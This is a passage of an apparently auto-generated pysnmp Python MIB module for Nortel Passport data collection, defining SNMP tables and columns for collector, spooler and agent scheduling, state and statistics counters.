if mibBuilder.loadTexts: mscColRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColTimesTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266), )
if mibBuilder.loadTexts: mscColTimesTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesTable.setDescription('This attribute specifies the scheduled times at which data should be collected. Only accounting applications need the capability to generate data in this way. Setting this attribute for other streams has no effect. The user can enter the times in any order and duplicates are prevented at data entry. There is a limit of 24 entries, which is imposed at semantic check time. The collection times are triggered in chronological order. A semantic check error is issued if any 2 entries are less than 1 hour apart or if any 2 entries are more than 12 hours apart (which implies that if any entries are provided, there must be at least 2 entries). Note that by default (that is, in the absence of a provisioned schedule), a Virtual Circuit (VC) starts its own 12-hour accounting timer. If any collection times are provisioned here, then the Time- Of-Day-Accounting (TODA) method is used in place of 12-hour accounting. This is applicable to both Switched VCs and Permanent VCs.')
mscColTimesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColTimesValue"))
if mibBuilder.loadTexts: mscColTimesEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesEntry.setDescription('An entry in the mscColTimesTable.')
mscColTimesValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColTimesValue.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesValue.setDescription('This variable represents both the value and the index for the mscColTimesTable.')
mscColTimesRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 2), RowStatus()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: mscColTimesRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesRowStatus.setDescription('This variable is used to control the addition and deletion of individual values of the mscColTimesTable.')
mscColLastTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275), )
if mibBuilder.loadTexts: mscColLastTable.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastTable.setDescription('Note: This was made obsolete in R4.1 (BD0108A). This attribute is used for Collector/stats and Collector/account. For statistics, when collection is turned off, or prior to the very first probe, the value is the empty list. Otherwise, this is the network time at which the last probe was sent out (that is, the last time that statistics were collected from, or at least reset by, the applications providing them). For accounting, when no entries exist in collectionTimes, or prior to the very first collection time, the value is the empty list. Otherwise, this is the network time at which the last time-of-day changeover occurred.')
mscColLastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColLastValue"))
if mibBuilder.loadTexts: mscColLastEntry.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastEntry.setDescription('An entry in the mscColLastTable.')
mscColLastValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(19, 19)).setFixedLength(19)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColLastValue.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastValue.setDescription('This variable represents both the value and the index for the mscColLastTable.')
mscColPeakTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279), )
if mibBuilder.loadTexts: mscColPeakTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakTable.setDescription('This attribute specifies the length of the accounting peak water mark interval. It is at least one minute and at most 15 minutes long. An accounting peak water mark within a given accounting interval is the accounting count which occured during a peak water mark interval with the highest traffic. Peak water marks are used to determine traffic bursts. If no value is provisioned for this attribute value of 5 minutes is assumed. Peak water mark is only measured if attribute collectionTimes in Collector/account is provisioned.')
mscColPeakEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColPeakValue"))
if mibBuilder.loadTexts: mscColPeakEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakEntry.setDescription('An entry in the mscColPeakTable.')
mscColPeakValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColPeakValue.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakValue.setDescription('This variable represents both the value and the index for the mscColPeakTable.')
mscColPeakRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 2), RowStatus()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: mscColPeakRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakRowStatus.setDescription('This variable is used to control the addition and deletion of individual values of the mscColPeakTable.')
mscColSp = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2))
mscColSpRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1), )
if mibBuilder.loadTexts: mscColSpRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatusTable.setDescription('This entry controls the addition and deletion of mscColSp components.')
mscColSpRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatusEntry.setDescription('A single entry in the table represents a single mscColSp component.')
mscColSpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscColSp components. These components cannot be added nor deleted.')
mscColSpComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColSpStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStorageType.setDescription('This variable represents the storage type value for the mscColSp tables.')
mscColSpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscColSpIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpIndex.setDescription('This variable represents the index for the mscColSp tables.')
mscColSpProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10), )
if mibBuilder.loadTexts: mscColSpProvTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProvTable.setDescription('This group specifies all of the provisioning data for a DCS Spooler.')
mscColSpProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpProvEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProvEntry.setDescription('An entry in the mscColSpProvTable.')
mscColSpSpooling = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("off", 0), ("on", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColSpSpooling.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpSpooling.setDescription('This attribute specifies whether or not this type of data is spooled to the disk. If set to off, it is roughly equivalent to Locking the Spooler (except this will survive processor restarts). The following defaults are used: - alarm: on - accounting: on - log: on - debug: off - scn: on - trap: off (see Note below) - stats: on Note that SNMP Traps cannot be spooled. A semantic check prevents the user from setting the value to on for the trap stream.')
mscColSpMaximumNumberOfFiles = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 200))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setDescription("This attribute specifies the maximum number of files that should be kept on the disk in the directory containing the closed files of this type. The value 0 is defined to mean 'unlimited'. A different default for each type of Spooler is defined as follows: - alarm: 30 - accounting: 200 - debug: 2 - log: 10 - scn: 10 - trap: 2 (this value is meaningless and is ignored) - stats: 200")
mscColSpStateTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11), )
if mibBuilder.loadTexts: mscColSpStateTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStateTable.setDescription('This group contains the three OSI State attributes and the six OSI Status attributes. The descriptions generically indicate what each attribute implies about the component. Note that not all the values and state combinations described here are supported by every component which uses this group. For component-specific information and the valid state combinations, refer to NTP 241- 7001-150, Passport Operations and Maintenance Guide.')
mscColSpStateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpStateEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStateEntry.setDescription('An entry in the mscColSpStateTable.')
mscColSpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("locked", 0), ("unlocked", 1), ("shuttingDown", 2))).clone('unlocked')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAdminState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAdminState.setDescription('This attribute indicates the OSI Administrative State of the component. The value locked indicates that the component is administratively prohibited from providing services for its users. A Lock or Lock - force command has been previously issued for this component. When the value is locked, the value of usageState must be idle. The value shuttingDown indicates that the component is administratively permitted to provide service to its existing users only. A Lock command was issued against the component and it is in the process of shutting down. The value unlocked indicates that the component is administratively permitted to provide services for its users. To enter this state, issue an Unlock command to this component. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpOperationalState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disabled", 0), ("enabled", 1))).clone('disabled')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperationalState.setDescription('This attribute indicates the OSI Operational State of the component. The value enabled indicates that the component is available for operation. Note that if adminState is locked, it would still not be providing service. The value disabled indicates that the component is not available for operation. For example, something is wrong with the component itself, or with another component on which this one depends. If the value is disabled, the usageState must be idle. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpUsageState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("idle", 0), ("active", 1), ("busy", 2))).clone('idle')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpUsageState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpUsageState.setDescription('This attribute indicates the OSI Usage State of the component. The value idle indicates that the component is not currently in use. The value active indicates that the component is in use and has spare capacity to provide for additional users. The value busy indicates that the component is in use and has no spare operating capacity for additional users at this time. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setDescription('If supported by the component, this attribute indicates the OSI Availability status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value inTest indicates that the resource is undergoing a test procedure. If adminState is locked or shuttingDown, the normal users are precluded from using the resource and controlStatus is reservedForTest. Tests that do not exclude additional users can be present in any operational or administrative state but the reservedForTest condition should not be present. The value failed indicates that the component has an internal fault that prevents it from operating. The operationalState is disabled. The value dependency indicates that the component cannot operate because some other resource on which it depends is unavailable. The operationalState is disabled. The value powerOff indicates the resource requires power to be applied and it is not powered on. The operationalState is disabled. The value offLine indicates the resource requires a routine operation (either manual, automatic, or both) to be performed to place it on-line and make it available for use. The operationalState is disabled. The value offDuty indicates the resource is inactive in accordance with a predetermined time schedule. In the absence of other disabling conditions, the operationalState is enabled or disabled. The value degraded indicates the service provided by the component is degraded in some way, such as in speed or operating capacity. However, the resource remains available for service. The operationalState is enabled. The value notInstalled indicates the resource is not present. The operationalState is disabled. The value logFull is not used. Description of bits: inTest(0) failed(1) powerOff(2) offLine(3) offDuty(4) dependency(5) degraded(6) notInstalled(7) logFull(8)')
mscColSpProceduralStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpProceduralStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProceduralStatus.setDescription("If supported by the component, this attribute indicates the OSI Procedural status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value initializationRequired indicates (for a resource which doesn't initialize autonomously) that initialization is required before it can perform its normal functions, and this procedure has not been initiated. The operationalState is disabled. The value notInitialized indicates (for a resource which does initialize autonomously) that initialization is required before it can perform its normal functions, and this procedure has not been initiated. The operationalState may be enabled or disabled. The value initializing indicates that initialization has been initiated but is not yet complete. The operationalState may be enabled or disabled. The value reporting indicates the resource has completed some processing operation and is notifying the results. The operationalState is enabled. The value terminating indicates the component is in a termination phase. If the resource doesn't reinitialize autonomously, operationalState is disabled; otherwise it is enabled or disabled. Description of bits: initializationRequired(0) notInitialized(1) initializing(2) reporting(3) terminating(4)")
mscColSpControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpControlStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpControlStatus.setDescription('If supported by the component, this attribute indicates the OSI Control status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value subjectToTest indicates the resource is available but tests may be conducted simultaneously at unpredictable times, which may cause it to exhibit unusual characteristics. The value partOfServicesLocked indicates that part of the service is restricted from users of a resource. The adminState is unlocked. The value reservedForTest indicates that the component is administratively unavailable because it is undergoing a test procedure. The adminState is locked. The value suspended indicates that the service has been administratively suspended. Description of bits: subjectToTest(0) partOfServicesLocked(1) reservedForTest(2) suspended(3)')
mscColSpAlarmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAlarmStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAlarmStatus.setDescription('If supported by the component, this attribute indicates the OSI Alarm status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value underRepair indicates the component is currently being repaired. The operationalState is enabled or disabled. The value critical indicates one or more critical alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value major indicates one or more major alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value minor indicates one or more minor alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value alarmOutstanding generically indicates that an alarm of some severity is outstanding against the component. Description of bits: underRepair(0) critical(1) major(2) minor(3) alarmOutstanding(4)')
mscColSpStandbyStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 15))).clone(namedValues=NamedValues(("hotStandby", 0), ("coldStandby", 1), ("providingService", 2), ("notSet", 15))).clone('notSet')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpStandbyStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStandbyStatus.setDescription('If supported by the component, this attribute indicates the OSI Standby status of the component. The value notSet indicates that either the attribute is not supported or that none of the status conditions described below are present. Note that this is a non-standard value, used because the original specification indicated this attribute was set-valued and thus, did not provide a value to indicate that none of the other three are applicable. The value hotStandby indicates that the resource is not providing service but will be immediately able to take over the role of the resource to be backed up, without initialization activity, and containing the same information as the resource to be backed up. The value coldStandby indicates the resource is a backup for another resource but will not be immediately able to take over the role of the backed up resource and will require some initialization activity. The value providingService indicates that this component, as a backup resource, is currently backing up another resource.')
mscColSpUnknownStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("false", 0), ("true", 1))).clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpUnknownStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpUnknownStatus.setDescription('This attribute indicates the OSI Unknown status of the component. The value false indicates that all of the other OSI State and Status attribute values can be considered accurate. The value true indicates that the actual state of the component is not known for sure.')
mscColSpOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12), )
if mibBuilder.loadTexts: mscColSpOperTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperTable.setDescription('This group contains the operational attributes specific to a DCS Spooler.')
mscColSpOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpOperEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperEntry.setDescription('An entry in the mscColSpOperTable.')
mscColSpSpoolingFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1, 1), AsciiString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpSpoolingFileName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpSpoolingFileName.setDescription('When spooling is on, this attribute contains the name of the open file into which data is currently being spooled. When spooling is off, the value of this attribute is the empty string.')
mscColSpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13), )
if mibBuilder.loadTexts: mscColSpStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStatsTable.setDescription('This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColSpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStatsEntry.setDescription('An entry in the mscColSpStatsTable.')
mscColSpCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColSpRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColSpRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3))
mscColAgRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1), )
if mibBuilder.loadTexts: mscColAgRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatusTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This entry controls the addition and deletion of mscColAg components.')
mscColAgRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatusEntry.setDescription('A single entry in the table represents a single mscColAg component.')
mscColAgRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscColAg components. These components cannot be added nor deleted.')
mscColAgComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColAgStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStorageType.setDescription('This variable represents the storage type value for the mscColAg tables.')
mscColAgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15)))
if mibBuilder.loadTexts: mscColAgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgIndex.setDescription('This variable represents the index for the mscColAg tables.')
mscColAgStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10), )
if mibBuilder.loadTexts: mscColAgStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStatsTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColAgStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStatsEntry.setDescription('An entry in the mscColAgStatsTable.')
mscColAgCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColAgRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAgRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAgAgentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11), )
if mibBuilder.loadTexts: mscColAgAgentStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgAgentStatsTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This group contains the statistical attributes specific to the DCS Agent components.')
mscColAgAgentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setDescription('An entry in the mscColAgAgentStatsTable.')
mscColAgRecordsNotGenerated = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setDescription('This attribute counts the records of a particular event type on this Card which could not be generated by some application due to some problem such as insufficient resources. One cannot tell exactly which event could not be generated, nor which application instance tried to generate it, but when this count increases, it is an indicator that some re-engineering may be required and will provide some idea as to why a record is missing. This counter wraps to 0 when the maximum value is exceeded.')
dataCollectionGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1))
dataCollectionGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1))
dataCollectionGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3))
dataCollectionGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3, 2))
